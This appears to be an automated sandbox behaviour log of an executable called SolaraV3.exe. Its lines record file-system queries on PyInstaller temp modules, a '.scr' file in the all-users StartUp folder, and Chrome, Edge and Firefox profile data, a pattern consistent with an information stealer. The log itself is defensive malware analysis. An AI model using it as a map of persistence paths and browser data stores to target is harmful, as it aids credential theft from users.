Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\_socket.pyd VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\select.pyd VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\_ssl.pyd VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\_hashlib.pyd VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\_queue.pyd VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\unicodedata.pyd VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\??? .scr VolumeInformation
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Temp VolumeInformation
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformation
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformation
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformation
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools VolumeInformation
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras\AutoItX VolumeInformation
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp VolumeInformation
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\AutofillStates VolumeInformation
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\CommerceHeuristics VolumeInformation
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\attachments VolumeInformation
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage VolumeInformation
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\6f70cc77-7837-4f44-9c31-7de59e446d67 VolumeInformation
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir VolumeInformation
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir VolumeInformation
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache VolumeInformation
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda VolumeInformation
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0 VolumeInformation
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css VolumeInformation
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html VolumeInformation
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg VolumeInformation
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\cs VolumeInformation
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\da VolumeInformation
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\en VolumeInformation
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\en_GB VolumeInformation
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\fi VolumeInformation
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\fil VolumeInformation
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\it VolumeInformation
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\id VolumeInformation
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\nl VolumeInformation
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ru VolumeInformation
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_metadata VolumeInformation
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\Temp VolumeInformation
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker VolumeInformation
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB VolumeInformation
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache VolumeInformation
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb VolumeInformation
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network VolumeInformation
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store VolumeInformation
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB VolumeInformation
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB VolumeInformation
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage VolumeInformation
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db VolumeInformation
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles VolumeInformation
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata VolumeInformation
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database VolumeInformation
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext VolumeInformation
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda VolumeInformation
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def VolumeInformation
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics VolumeInformation
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache VolumeInformation
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\Cache_Data VolumeInformation
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index-dir VolumeInformation
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCache VolumeInformation
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db VolumeInformation
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB VolumeInformation
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files VolumeInformation
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules VolumeInformation
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts VolumeInformation
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App Settings VolumeInformation
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB VolumeInformation
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\fr VolumeInformation
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings VolumeInformation
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources VolumeInformation
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Temp VolumeInformation
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_aghbiahbpaijignceidepookljebhfak VolumeInformation
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\pt_PT VolumeInformation
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ro VolumeInformation
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\sk VolumeInformation
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\sl VolumeInformation
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\sr VolumeInformation
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\sv VolumeInformation
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\th VolumeInformation
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\tr VolumeInformation
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\uk VolumeInformation
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\vi VolumeInformation
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\zh_CN VolumeInformation
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\zh_TW VolumeInformation
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB VolumeInformation
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store VolumeInformation
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption VolumeInformation
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage VolumeInformation
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store VolumeInformation
